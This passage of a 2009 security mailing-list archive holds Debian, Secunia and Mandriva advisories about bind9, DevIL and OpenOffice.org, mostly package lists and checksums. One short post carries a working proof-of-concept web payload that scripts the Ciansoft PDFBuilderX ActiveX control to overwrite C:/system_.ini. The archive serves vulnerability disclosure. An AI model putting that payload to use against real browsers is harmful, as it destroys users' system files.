    Size/MD5 checksum:   113348 c697f17d93aa609ef448edf740ca132a

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:    94150 0177400160d90cc2d662ca3a6688178e
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   179698 310f99bbfb09db4f5ea5dff07b66bb63
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   107218 c6b342a831948a7bf7801d46d38290c4
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   113072 a27b2fe4ed7a345d258313ddc4f8346f
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   110300 fb55450e28a08d2010b6e93e17b895ae
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:    94980 fb919221192449e70239f8991f01636b
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   488288 8a089d802fd33105a3699e81480439c9
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   210968 e5c3f788c66086cf7dcd26215a17a0f8
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:  1205504 260e40c7c015eca2a29612c725d8dd35
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   174202 765ab3865c5a811dac4ac157e358a318
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_mipsel.deb
    Size/MD5 checksum:   299586 5f5e170a809055667994b7b76b0745a1

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   301350 a20ea0a911818a574701d68e29f3a2d1
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   183376 c550243d0a3b401d2970a3973f656120
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:    96210 4116f47d69a3f83ce9022b306b1e6826
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:    96250 112e99a3eead25467bbb19895cc1eb3a
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   173642 27ea1f6607f69941e718884d7b90b626
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   109316 2158dc4b86fcc4b841776df478bafe2d
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   206910 0f1968d555573c2fd230ffb92109e729
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   488474 8fc4aa4a58958441f5cda10c83a24e05
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:  1167916 45c319145305d976c147af786f10f65a
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   113906 a908806289ae42f4947557f82952d1c6
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_powerpc.deb
    Size/MD5 checksum:   112320 3bf75de9190d5c0012510fffacd4d980

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   114300 d5ab339f6f1505b6efe1caab0f91b4b0
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:    95710 23cc9069086681ec048ab64d04150b78
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   196642 a135997ee33f30d6a9656563cf398ce1
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   331958 3c560c643e1a60548ef5c4f567b3bbf6
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   194782 bd4744eff4c131183da5c32fa9197b81
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   118206 ddd094acc29a60f0ad39deb9ffcc3b53
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   579538 6b6bb21b3ba7fcc3d0a96fb29e32b24e
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:  1137454 2b639e2c0c5e2bed36db838611141876
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   116708 bab63e3ca69977baa87b07181ca5d1a4
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:    97832 5e3591957078a61702b71fdb2e24fdfc
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_s390.deb
    Size/MD5 checksum:   234026 dcf706e32b50ab97068af14126bb65bd

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   183878 eee08db142d1871d4b692dbbcd15999a
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   111224 261734b90a58046ad8ccd7ecf45629c3
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   114294 b9d3bc689a758181f7a6068db8970fe5
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:  1122546 27f759bbc75c0da9c82cb26769d122c2
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   175962 9a2373e0bb287efc7eb53697b91de147
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   107672 348e2faed12a7a66d00c3d3eed509605
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   210612 0f479f72667f152c97491331fd3a7ed8
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   494486 69c393bf175654857ec2151d4ee47a4e
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:    95434 34974e2951421e842ea394dbba268bb2
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:    95384 429ec6ce3ab7f33b25e008277b542a03
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_sparc.deb
    Size/MD5 checksum:   300876 a0a9ae53e63e2dbb54b6db43dfbb1c72


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJa7VHAAoJEL97/wQC1SS+y50H/A5YPrLJyzVFbWrBoGtQlsYy
4XigQsKK16mPXuBkjlonghHbgCgHbjoeuBh6FRWB6WJ32N+jvBid0c84sJ3m8J2+
7lr4d7tIrhWsMHlhcC1w/l9FUbl03By4OjTlXimbIxZa41gxCmckYU5Xppb4Ywhc
rc8THcuncUI5USuFtgt0JXczligi4uOpYD4aAEVGPGJXXCheKOOmAusi1lKqdM8Q
PC+v+Xu2Et3iE0zNTMPBpf0g1JuOYBo80iJtA0t/AsIe76ptX088BUhe8PvGILZt
wF+na1j7rg2lBfQgOwst3VnGncNNrCEITEEy/u2JmizRGwHk0usS+j5Q6Rk3mj0=5Um+
-----END PGP SIGNATURE-----

From - Tue Jan 13 11:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058a7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39143-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B8ECDEC132
for <lists@securityspace.com>; Tue, 13 Jan 2009 11:25:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 23A4923762C; Tue, 13 Jan 2009 09:08:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24254 invoked from network); 13 Jan 2009 09:03:35 -0000
Date: Tue, 13 Jan 2009 10:22:32 +0100
Message-Id: <200901130922.n0D9MWPm013470@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: DevIL "iGetHdrHeader()" Buffer Overflow Vulnerabilities
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 13/01/2009

       DevIL "iGetHdrHeader()" Buffer Overflow Vulnerabilities

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* DevIL 1.7.4.

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Moderately critical
Impact: System access
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"Developer's Image Library (DevIL) is a programmer's library to
develop applications with very powerful image loading capabilities,
yet is easy for a developer to learn and use.".

Product Link:
http://openil.sourceforge.net/

=====================================================================4) Description of Vulnerability

Secunia Research has discovered two vulnerabilities in DevIL, which
can be exploited by malicious people to compromise an application
using the library.

The vulnerabilities are caused due to boundary errors within the
"iGetHdrHeader()" function in src-IL/src/il_hdr.c. These can be 
exploited to cause a stack-based buffer overflow when processing
specially crafted Radiance RGBE files.

Successful exploitation allows execution of arbitrary code.

=====================================================================5) Solution 

Fixed in the SVN repository.

=====================================================================6) Time Table 

09/01/2009 - Vendor notified.
10/01/2009 - Vendor response.
13/01/2009 - Public disclosure.

=====================================================================7) Credits 

Discovered by Stefan Cornelius, Secunia Research.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-5262 for the vulnerabilities.

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-59/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Jan 13 11:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058a8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39144-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7DFC9EC132
for <lists@securityspace.com>; Tue, 13 Jan 2009 11:36:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 81DBB23762E; Tue, 13 Jan 2009 09:09:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26901 invoked from network); 13 Jan 2009 11:18:13 -0000
Subject: =?UTF-8?Q?PDFBuilderX_2.2_Arbitrary_File_Overwrite_?From: =?UTF-8?Q?fakeperson7?= <fakeperson7@tlen.pl>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Message-ID: <333867f0.5e6eb576.496c7df7.55db8@o2.pl>
Date: Tue, 13 Jan 2009 12:41:43 +0100
X-Originator: 87.199.40.131
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
Status:   

Alfons Luja 
========================================================================================================================


<b>   
    Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite    <br/>
                         p0c                            <br/>
                     Alfons Luja                        <br/>
            Pozdrowienia dla odFiecznych fanÓf          <br/>                                   
                      Tesw Eporue                       <br/>
                        -9002-                          <br/>
                         l00l                           <br/>  
<b/>
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
/*
 Class PDFDoc
 GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPStorage Safe:  Safe for untrusted: caller,data  
 KillBitSet: False
 vend0r : www.ciansoft.com
*/ 
try{
    var obj = document.getElementById('kupa');
    obj.AddPage(1);
    obj.SaveToFile("C:/system_.ini");
    window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){  window.alert('Poc failed'); }
</script>
========================================================================================================================

From - Tue Jan 13 12:52:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ab
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39146-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 10BA7EC11A
for <lists@securityspace.com>; Tue, 13 Jan 2009 12:52:09 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8B44E14372F; Tue, 13 Jan 2009 09:50:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2710 invoked from network); 13 Jan 2009 16:23:11 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=Z3iQbsq9Ej7gepUNzo0A:9 a=wGCjgNuSyyQBnyw9D9wA:7 a=i-B4tkmB0S4kfD76IYPUCYmdYukA:4 a=SF8zuVGNLiUA:10 a=zvm9xgTIpEoA:10 a=Er2gK3W4G3kA:10 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:006 ] openoffice.org
Date: Tue, 13 Jan 2009 09:53:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMmVh-00070D-52@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:006
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openoffice.org
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 Heap-based overflow on functions to manipulate WMF and EMF files
 in OpenOffice.org documments enables remote attackers to execute
 arbitrary code on documments holding certain crafted either WMF or
 EMF files (CVE-2008-2237) (CVE-2008-2238).
 
 This update provide the fix for these security issues and further
 openoffice.org-voikko package has been updated as it depends on
 openoffice.org packages.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 c8003a94012cbfbfdc78dc59c29b317a  2008.0/i586/openoffice.org-2.2.1-4.6mdv2008.0.i586.rpm
 eb4558b9ddf8102b8807904480347bce  2008.0/i586/openoffice.org-devel-2.2.1-4.6mdv2008.0.i586.rpm
 3fbd98ec9ec98d19920ee2f7e1e50a87  2008.0/i586/openoffice.org-devel-doc-2.2.1-4.6mdv2008.0.i586.rpm
 142a1aed05561e28c3830914e6d0f974  2008.0/i586/openoffice.org-galleries-2.2.1-4.6mdv2008.0.i586.rpm
 c588126b14b10b994ba9cbfb35723c94  2008.0/i586/openoffice.org-gnome-2.2.1-4.6mdv2008.0.i586.rpm
 29cf48aaa4cd6b169d95455ddd46272d  2008.0/i586/openoffice.org-kde-2.2.1-4.6mdv2008.0.i586.rpm
 1b7913e881bb6ba38a8b3a2636e380b4  2008.0/i586/openoffice.org-l10n-af-2.2.1-4.6mdv2008.0.i586.rpm
 14a9c26ab83b959573f1c6dd5bc9eec1  2008.0/i586/openoffice.org-l10n-ar-2.2.1-4.6mdv2008.0.i586.rpm
 eef10a2af729a9b2c0cdb99e26e6a293  2008.0/i586/openoffice.org-l10n-bg-2.2.1-4.6mdv2008.0.i586.rpm
 c831e696a37859692ce7b660be2728d9  2008.0/i586/openoffice.org-l10n-br-2.2.1-4.6mdv2008.0.i586.rpm
 16a3ccecb405adbc116d2f53eb7dd3fe  2008.0/i586/openoffice.org-l10n-bs-2.2.1-4.6mdv2008.0.i586.rpm
 ad7019f7bb2f72457babbd8d64210296  2008.0/i586/openoffice.org-l10n-ca-2.2.1-4.6mdv2008.0.i586.rpm
 14f8fbac77b568f31b690ca45f7b80e5  2008.0/i586/openoffice.org-l10n-cs-2.2.1-4.6mdv2008.0.i586.rpm
 c37d144a36fde7f8413304ab777b9f94  2008.0/i586/openoffice.org-l10n-cy-2.2.1-4.6mdv2008.0.i586.rpm
 11bb48776cc25cb989487b28417f682f  2008.0/i586/openoffice.org-l10n-da-2.2.1-4.6mdv2008.0.i586.rpm
 c997b174dead2e7908ddcbed9a5eb09d  2008.0/i586/openoffice.org-l10n-de-2.2.1-4.6mdv2008.0.i586.rpm
 1e01973b26d83ce9d6e7125b1bd231c8  2008.0/i586/openoffice.org-l10n-el-2.2.1-4.6mdv2008.0.i586.rpm
 7a4bfa6c64fb50b81096850e95dfd012  2008.0/i586/openoffice.org-l10n-en_GB-2.2.1-4.6mdv2008.0.i586.rpm
 b4d13ec8eb43a85c23d5bc3abe4e8fa5  2008.0/i586/openoffice.org-l10n-es-2.2.1-4.6mdv2008.0.i586.rpm
 744c9dca6221390b621443792d8d5d31  2008.0/i586/openoffice.org-l10n-et-2.2.1-4.6mdv2008.0.i586.rpm
 39eaaba50da97d0a61639d142212eb99  2008.0/i586/openoffice.org-l10n-eu-2.2.1-4.6mdv2008.0.i586.rpm
 3bbb1a241620517de9aedbc75c4e77c6  2008.0/i586/openoffice.org-l10n-fi-2.2.1-4.6mdv2008.0.i586.rpm
 b9cf6178fd798d537512343482b6c002  2008.0/i586/openoffice.org-l10n-fr-2.2.1-4.6mdv2008.0.i586.rpm
 104f9ae58413f262150ffd8b51a7d586  2008.0/i586/openoffice.org-l10n-he-2.2.1-4.6mdv2008.0.i586.rpm
 35ddf2bff8b4b247ee28bb0319482bb9  2008.0/i586/openoffice.org-l10n-hi-2.2.1-4.6mdv2008.0.i586.rpm
 c951a086ef149b70b375c8da8911502c  2008.0/i586/openoffice.org-l10n-hu-2.2.1-4.6mdv2008.0.i586.rpm
 db6b30cb357b57b0ffdc2f86a6ace716  2008.0/i586/openoffice.org-l10n-it-2.2.1-4.6mdv2008.0.i586.rpm
 3e30f9903834545ae0e2026d29b2d827  2008.0/i586/openoffice.org-l10n-ja-2.2.1-4.6mdv2008.0.i586.rpm
 117e6645f44e54308426191ba4b0a9a2  2008.0/i586/openoffice.org-l10n-ko-2.2.1-4.6mdv2008.0.i586.rpm
 ec60d3ff33e8cf25521c1deb18f5dce9  2008.0/i586/openoffice.org-l10n-mk-2.2.1-4.6mdv2008.0.i586.rpm
 b3f0eacad6cd88595d00d330cb53cc5a  2008.0/i586/openoffice.org-l10n-nb-2.2.1-4.6mdv2008.0.i586.rpm
 b1318c5c509b9aa7c07b22b0fee5c384  2008.0/i586/openoffice.org-l10n-nl-2.2.1-4.6mdv2008.0.i586.rpm
 0f9a26d677e11dd20fd7a9a4c54010da  2008.0/i586/openoffice.org-l10n-nn-2.2.1-4.6mdv2008.0.i586.rpm
 e22bd6858ddcac57d4a211546e428456  2008.0/i586/openoffice.org-l10n-pl-2.2.1-4.6mdv2008.0.i586.rpm
 c235b9b8cf1bb6f4793f4060bc134910  2008.0/i586/openoffice.org-l10n-pt-2.2.1-4.6mdv2008.0.i586.rpm
 079751acd480d979685527a8c02bb6e6  2008.0/i586/openoffice.org-l10n-pt_BR-2.2.1-4.6mdv2008.0.i586.rpm
 82130aef5ded913e0bcee08b10e93175  2008.0/i586/openoffice.org-l10n-ru-2.2.1-4.6mdv2008.0.i586.rpm
 13b53d0c44e9578e91e4048257e1d60e  2008.0/i586/openoffice.org-l10n-sk-2.2.1-4.6mdv2008.0.i586.rpm
 7b74e302e056bab87abc645b3381faeb  2008.0/i586/openoffice.org-l10n-sl-2.2.1-4.6mdv2008.0.i586.rpm
 3a757bb6a24210ee781dba2b9be8ef88  2008.0/i586/openoffice.org-l10n-sv-2.2.1-4.6mdv2008.0.i586.rpm
 029c6529116b6dadebaec2a355a2e1a0  2008.0/i586/openoffice.org-l10n-ta-2.2.1-4.6mdv2008.0.i586.rpm
 2a2d450b1968cf9e149c7e2cf5709f82  2008.0/i586/openoffice.org-l10n-tr-2.2.1-4.6mdv2008.0.i586.rpm
 bdb7a00449619573d5bb2e21bf5fc6c4  2008.0/i586/openoffice.org-l10n-zh_CN-2.2.1-4.6mdv2008.0.i586.rpm
 3165b02b81d678d25d756a1ca9abe41b  2008.0/i586/openoffice.org-l10n-zh_TW-2.2.1-4.6mdv2008.0.i586.rpm
 cd228b1a3d6c3f0805db55202e935e15  2008.0/i586/openoffice.org-l10n-zu-2.2.1-4.6mdv2008.0.i586.rpm
 a9bc648c3d6964c8e6bba2c83e9d3024  2008.0/i586/openoffice.org-mono-2.2.1-4.6mdv2008.0.i586.rpm
 fcaffac86edc4bf2522f99e1fa7303dd  2008.0/i586/openoffice.org-ooqstart-2.2.1-4.6mdv2008.0.i586.rpm 
 f0d795e257dbe66668734b765fe6abb9  2008.0/SRPMS/openoffice.org-2.2.1-4.6mdv2008.0.src.rpm
 d6f8e16e8588488478e283f5f0606696  2008.0/SRPMS/openoffice.org64-2.2.1-4.6mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 8518ae26cd8840422390df0c59fe5271  2008.0/x86_64/openoffice.org64-2.2.1-4.6mdv2008.0.x86_64.rpm
 b6ae459ea55e19d42de92c46967a03e8  2008.0/x86_64/openoffice.org64-devel-2.2.1-4.6mdv2008.0.x86_64.rpm
 981b60af197d73574755bc6d7d04b514  2008.0/x86_64/openoffice.org64-devel-doc-2.2.1-4.6mdv2008.0.x86_64.rpm
 c017ecec1a413852817797f069b5eedf  2008.0/x86_64/openoffice.org64-galleries-2.2.1-4.6mdv2008.0.x86_64.rpm
 5c34b8bc8e8846895b2beffa491287a5  2008.0/x86_64/openoffice.org64-gnome-2.2.1-4.6mdv2008.0.x86_64.rpm
 d4a3a915687f6cf2fd0d45b171e3006a  2008.0/x86_64/openoffice.org64-kde-2.2.1-4.6mdv2008.0.x86_64.rpm
 925671d0d46e713a5acab03f6eeb7655  2008.0/x86_64/openoffice.org64-l10n-af-2.2.1-4.6mdv2008.0.x86_64.rpm
 5f153fc0cc4969af5c6e0906bed7adbb  2008.0/x86_64/openoffice.org64-l10n-ar-2.2.1-4.6mdv2008.0.x86_64.rpm
 1de9be3b4273bf09ac899173c7bfe4ab  2008.0/x86_64/openoffice.org64-l10n-bg-2.2.1-4.6mdv2008.0.x86_64.rpm
 084b078c7133e2d5e6c96167e98bbd1a  2008.0/x86_64/openoffice.org64-l10n-br-2.2.1-4.6mdv2008.0.x86_64.rpm
 6b8484a67c75be15ba1a7d2ceccf2f90  2008.0/x86_64/openoffice.org64-l10n-bs-2.2.1-4.6mdv2008.0.x86_64.rpm
 357c23965b98cfbea5c75e44469e2a70  2008.0/x86_64/openoffice.org64-l10n-ca-2.2.1-4.6mdv2008.0.x86_64.rpm
 14bd6e609d9e32a975944505d9d9d2e2  2008.0/x86_64/openoffice.org64-l10n-cs-2.2.1-4.6mdv2008.0.x86_64.rpm
 665a9be57a5ff6a1ad5b492652bb4460  2008.0/x86_64/openoffice.org64-l10n-cy-2.2.1-4.6mdv2008.0.x86_64.rpm
 dd9904dcd2f11ea9a6da060b4818cfe3  2008.0/x86_64/openoffice.org64-l10n-da-2.2.1-4.6mdv2008.0.x86_64.rpm
 1b8f4f66acb3d4856d05d7c677bc53a5  2008.0/x86_64/openoffice.org64-l10n-de-2.2.1-4.6mdv2008.0.x86_64.rpm
 2acc6103ef6f88c1b38c30c535ff16d3  2008.0/x86_64/openoffice.org64-l10n-el-2.2.1-4.6mdv2008.0.x86_64.rpm
 c06ed53b252ae3966bbc1c57110668b0  2008.0/x86_64/openoffice.org64-l10n-en_GB-2.2.1-4.6mdv2008.0.x86_64.rpm
 a5165849ac95e26b86d602f04ed8e689  2008.0/x86_64/openoffice.org64-l10n-es-2.2.1-4.6mdv2008.0.x86_64.rpm
 a3113b844fb4a8bb157e58abf05efa42  2008.0/x86_64/openoffice.org64-l10n-et-2.2.1-4.6mdv2008.0.x86_64.rpm
 dde3fd14e5f3045096604b5e079ebab4  2008.0/x86_64/openoffice.org64-l10n-eu-2.2.1-4.6mdv2008.0.x86_64.rpm
 66bd478932419889b9011047865d5b46  2008.0/x86_64/openoffice.org64-l10n-fi-2.2.1-4.6mdv2008.0.x86_64.rpm
 a504ed22c95ee47610ae803743be512b  2008.0/x86_64/openoffice.org64-l10n-fr-2.2.1-4.6mdv2008.0.x86_64.rpm
 478c2787d3ad5d92c60e1fc757452f5b  2008.0/x86_64/openoffice.org64-l10n-he-2.2.1-4.6mdv2008.0.x86_64.rpm
 6fcbeaa0cf2266cec8ce147f13b7928c  2008.0/x86_64/openoffice.org64-l10n-hi-2.2.1-4.6mdv2008.0.x86_64.rpm
 a6bab01ce5b9b9bdc94fb28a4faa461d  2008.0/x86_64/openoffice.org64-l10n-hu-2.2.1-4.6mdv2008.0.x86_64.rpm
 51ca67abbb8269d687229c5899534937  2008.0/x86_64/openoffice.org64-l10n-it-2.2.1-4.6mdv2008.0.x86_64.rpm
 fafb057cae73d1da0fe14de30c64857b  2008.0/x86_64/openoffice.org64-l10n-ja-2.2.1-4.6mdv2008.0.x86_64.rpm
 75258faa3eab57d858424841df662849  2008.0/x86_64/openoffice.org64-l10n-ko-2.2.1-4.6mdv2008.0.x86_64.rpm
 79b6b22f157d4589a2d0306b115c36c2  2008.0/x86_64/openoffice.org64-l10n-mk-2.2.1-4.6mdv2008.0.x86_64.rpm
 10694a341069c68bbfc8bf726d32e1ca  2008.0/x86_64/openoffice.org64-l10n-nb-2.2.1-4.6mdv2008.0.x86_64.rpm
 c21b7e976ec36f906ec6219ab545a870  2008.0/x86_64/openoffice.org64-l10n-nl-2.2.1-4.6mdv2008.0.x86_64.rpm
